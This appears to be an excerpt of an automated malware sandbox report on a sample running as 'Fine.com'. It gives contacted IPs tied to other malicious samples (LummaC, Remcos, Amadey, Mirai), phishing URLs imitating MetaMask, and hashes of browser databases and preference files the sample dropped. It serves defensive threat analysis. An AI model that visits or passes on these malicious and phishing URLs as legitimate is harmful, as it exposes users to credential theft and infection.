• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
11:22:03 | API Interceptor | 1x Sleep call for process: mNPTwHOuvT.exe modified
11:22:06 | API Interceptor | 5x Sleep call for process: Fine.com modified

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
162.159.61.3 | 1507513743282749438.js | Get hash | malicious | Strela Downloader | Browse
| 348426869538810128.js | Get hash | malicious | Strela Downloader | Browse
| https://www.axis.com/ftp/pub_soft/cam_srv/IPUtility/latest/AxisIPUtilitySetup.exe | Get hash | malicious | Unknown | Browse
| https://sanctionssearch.ofac.treas.gov | Get hash | malicious | Unknown | Browse
| https://bryf.atchirlisc.ru/EeMAGvIe/ | Get hash | malicious | HTMLPhisher | Browse
| 24EPV9vjc5.exe | Get hash | malicious | Unknown | Browse
| kXzODlqJak.exe | Get hash | malicious | Unknown | Browse
| https://combatironapparel.com/collections/ranger-panty-shorts | Get hash | malicious | Unknown | Browse
| 24EPV9vjc5.exe | Get hash | malicious | Unknown | Browse
18.244.18.27 | https://www.depoqq.win/geno | Get hash | malicious | Unknown | Browse
| bc7EKCf.exe | Get hash | malicious | StormKitty | Browse
| w3245.exe | Get hash | malicious | Unknown | Browse
| random.exe | Get hash | malicious | Unknown | Browse
| https://mmm.askfollow.us/#CRD | Get hash | malicious | Unknown | Browse
| FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | Get hash | malicious | Unknown | Browse
| over.ps1 | Get hash | malicious | Vidar | Browse
| file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
| file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | Browse
| seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta | Get hash | malicious | Cobalt Strike, Remcos, HTMLPhisher | Browse
18.238.49.99 | file.exe | Get hash | malicious | Amadey, XWorm | Browse
                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                      PrintDriver_x64.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                        http://links.notification.intuit.com/ls/click?upn=u001.4HBRtPy8j6uXsK2aeX2RzAh5EFPhCIIFV3VEN-2Fx7CtL7yL0rqbEG5To4Yn7gWqQ9aLy0xQjXtfA1aWI51jOBcrR1eQzA8QGOomZG0r-2F1L3xfvKQRg-2BEyxGkSu4vqMvT3Zlt7lGeB1VOaeykzOt3ZDctgl2T2qY2gdFbw71IbKeydmCVH57FH4-2Bk08GpXm1x-2F2nzoBQLSkxF-2FwWjk40Ia1FY7h48BjzV8-2BweJvORoJbjZIgnINFLIitY5wnHMUk9zi-2BEedqu8sb0GLWLVBlJVNQ-3D-3Dx_AC_lCay72zKSmfUKbkKk2J-2BPxwv2SAeAKjQcOxsRuOInPuysVz104apsNtjUewVeIWHnXorE30rsBZgkf3t8Vp6CK810sRg1lwAGaRVFnm5lm-2Fk3mIwY1uUhJJ-2B-2BNpF3as4GPkU-2BjLD8bErFWqA6MfSIhKydrm8cu6BZ94TIhND2wQhcB60jfsO8rY5KajVtIWdxM-2BpvOcfVgXLfc4XOGCHh2KoB1WH8PvKhnzdR0VSESurjb6bQnAOcmSC8EjBGofXl-2B5LRii0Mv11fC5EKm2sETXMCpAnqmTyhnQQKYVpgWHi9XelqrgPUPqzNl76Rot5RRo4hNwA0Oux-2BRVtq-2Bu51LUkSwOrU9xVpmZGLPTh9MBa-2BMbPaDWlS648I44qoHQ11yvkjn3RscnfozG-2Byj4rQQeGSzU1Wlwsq6WzlxGBYhZ7loUhj7CT7NTFl04MRoD7IEMvO-2BUgTBj-2Ft5XBO09AZyh4oMK-2Fj4BFkVM6IfvutGUJmqcZo9jegoVOSiodeVM0p4ze4hyufsjXvFUs-2B9VfUHtx-2FryoPKtsYEQatHK1924SvhlQrjL1i-2F32F3lOarhkupGO4IkmVCQgUk1qWnvHH3nwJ16wza5cK4HaBW2mxoQ88n-2BDBVYvaZkK-2FJiISMVf0aCx-2FTwkBWuzdqyN-2BoZSTHXQsQ26QdCzbiML5QsCvSKqc0BpBnXKyJLOcDt1T-2FxEGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          invoice 700898 for wallcentre.com.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            Zehnder_SuiteCommerce_Zehnder Rittling (4 29 2024).xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              https://jagurihgroup.com/wader/steerable/?a=dj7BxaR5P3DM9rDGet hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                                                https://www.canva.com/design/DAGAKNghr4A/3gUMtWRotAcalbbQiAq1GQ/edit?utm_content=DAGAKNghr4A&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                  https://ergv54ergrz.s3.amazonaws.com/uhdigth1.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    23.43.85.42BraveBrowserSetup-BRV002.exeGet hashmaliciousUnknownBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                                      • 13.248.243.5
                                                                                                                                                                                                                                                                                                      http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 13.248.243.5
                                                                                                                                                                                                                                                                                                      http://meittaammasskei-loogge.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 18.192.130.3
                                                                                                                                                                                                                                                                                                      AKAMAI-ASUSres.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 184.85.6.161
                                                                                                                                                                                                                                                                                                      176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.22.125
                                                                                                                                                                                                                                                                                                      https://terrific-metal-countess.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                      • 23.212.88.20
                                                                                                                                                                                                                                                                                                      x.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                                                                      GTT-BACKBONEGTTDEsora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                      • 65.175.21.112
                                                                                                                                                                                                                                                                                                      Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 151.171.224.56
                                                                                                                                                                                                                                                                                                      3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 212.222.229.103
                                                                                                                                                                                                                                                                                                      6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 77.67.97.71
                                                                                                                                                                                                                                                                                                      miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 204.93.45.114
                                                                                                                                                                                                                                                                                                      sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                      • 66.227.51.71
                                                                                                                                                                                                                                                                                                      sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                      • 212.221.104.230
                                                                                                                                                                                                                                                                                                      w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 23.43.85.38
                                                                                                                                                                                                                                                                                                      http://phothockey.chGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                                                                                      • 23.43.85.139
                                                                                                                                                                                                                                                                                                      Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 195.134.205.196
                                                                                                                                                                                                                                                                                                      AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                                                                                                                      • 54.171.230.55
                                                                                                                                                                                                                                                                                                      res.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 13.238.23.61
                                                                                                                                                                                                                                                                                                      res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 52.11.173.146
                                                                                                                                                                                                                                                                                                      3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 35.72.55.5
                                                                                                                                                                                                                                                                                                      PDF-523.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                                                                                                                      • 13.35.58.7
                                                                                                                                                                                                                                                                                                      Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                                                                                                                      • 45.112.123.227
                                                                                                                                                                                                                                                                                                      resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                                                                                                      • 18.153.198.123
                                                                                                                                                                                                                                                                                                      http://logiinnmaskemettaha93.godaddysites.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                      • 13.248.243.5
                                                                                                                                                                                                                                                                                                      http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 13.248.243.5
                                                                                                                                                                                                                                                                                                      http://meittaammasskei-loogge.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                      • 18.192.130.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| C:\Users\user\AppData\Local\Temp\424372\Fine.com | 1E3Vcm2yrA.exe | Get hash | malicious | RHADAMANTHYS | Browse | |
| | installer_1.05_37.4.exe | Get hash | malicious | LummaC | Browse | |
| | c.hta | Get hash | malicious | Remcos | Browse | |
| | c2.hta | Get hash | malicious | Remcos | Browse | |
| | c2.hta | Get hash | malicious | Remcos | Browse | |
| | Setup.exe | Get hash | malicious | LummaC | Browse | |
| | Setup.exe | Get hash | malicious | LummaC | Browse | |
| | Setup.exe | Get hash | malicious | LummaC | Browse | |
| | Full-Ver_Setup.exe | Get hash | malicious | LummaC Stealer | Browse | |
| | random.exe | Get hash | malicious | LummaC Stealer | Browse | |
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):9504
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                                          MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                                          SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                                          SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                                          SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                                                          MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                                                          SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                                                          SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                                                          SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.265130411026952
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:8/2qOB1nxCkMYSAELyKOMq+8yC8F/YfU5m+OlTLVum+:Bq+n0JY9ELyKOMq+8y9/Owd
                                                                                                                                                                                                                                                                                                                          MD5:1D5CF1DF51AACAAB4C9BC5F870931500
                                                                                                                                                                                                                                                                                                                          SHA1:ADEC7026A99F9E7BAFA34C90EACADC4AB146497C
                                                                                                                                                                                                                                                                                                                          SHA-256:934E4FD261421F160144C5F1FCA95B2A82ADFD64EE09F4A04D824270DC8F73D2
                                                                                                                                                                                                                                                                                                                          SHA-512:DB345A6C3628326B25B7B4A28E7A0F12913FBAF035AFDED90A0D257C51DEBDE3461F741598EA71DC012523BB1DBB0218E504A8FC609EBF64C24ECD31F7415A19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44612
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.096684137492156
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBRwu8hDO6vP6OgNou5uLtMdcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEH6AyuBchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:F27C4EA160A884EC7A22DBDD9A5FF0BE
                                                                                                                                                                                                                                                                                                                          SHA1:5A8EA7573E508786D158477FA8A637464073EE67
                                                                                                                                                                                                                                                                                                                          SHA-256:C69850C3629F179C96723EF836BAD02F3685B6B0C09B3D17000D062431D4415B
                                                                                                                                                                                                                                                                                                                          SHA-512:C450EC106DCF64DF7CAB8688CB4977711A3724C222F0FE15E1D282F769AC6FD66A8D27D07FBBCC6D20A20DC8CB78D51D5BBF3257A66A70B7ECC31A8C442AA18D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):45882
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090364441425301
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:7MkbJ6eg6KzhXRLrD9r4oUuphDO6vP6OgNouxc9y95XsAv8CAoDGoup1Xl3jVzXh:7Mk16zRRvD9r66AyutXORoDhu3VlXr42
                                                                                                                                                                                                                                                                                                                          MD5:E8AAF2D71D770475060F1ADC4A9B0EC3
                                                                                                                                                                                                                                                                                                                          SHA1:793CAF56DE623AF252B6D7A8918B9C2B936DE986
                                                                                                                                                                                                                                                                                                                          SHA-256:B1CD84C9BA191902B55231A6C9B5A329737DE4BFA8966D7F1A29415BFD2B684E
                                                                                                                                                                                                                                                                                                                          SHA-512:97034B6FE670F9D40EA4413AD5C19FC1816D6E2F9AC3EA4DC934DAF7924198FAC8496274E95758BE0D69C11EE39E02FCF0144D5A01813FAADB7B648CE72AE16A
                                                                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736698990"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):44612
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.096684137492156
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBRwu8hDO6vP6OgNou5uLtMdcGoup1Xl3jVzXr4CCz:z/Ps+wsI7ynEH6AyuBchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:F27C4EA160A884EC7A22DBDD9A5FF0BE
                                                                                                                                                                                                                                                                                                                          SHA1:5A8EA7573E508786D158477FA8A637464073EE67
                                                                                                                                                                                                                                                                                                                          SHA-256:C69850C3629F179C96723EF836BAD02F3685B6B0C09B3D17000D062431D4415B
                                                                                                                                                                                                                                                                                                                          SHA-512:C450EC106DCF64DF7CAB8688CB4977711A3724C222F0FE15E1D282F769AC6FD66A8D27D07FBBCC6D20A20DC8CB78D51D5BBF3257A66A70B7ECC31A8C442AA18D
                                                                                                                                                                                                                                                                                                                          Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
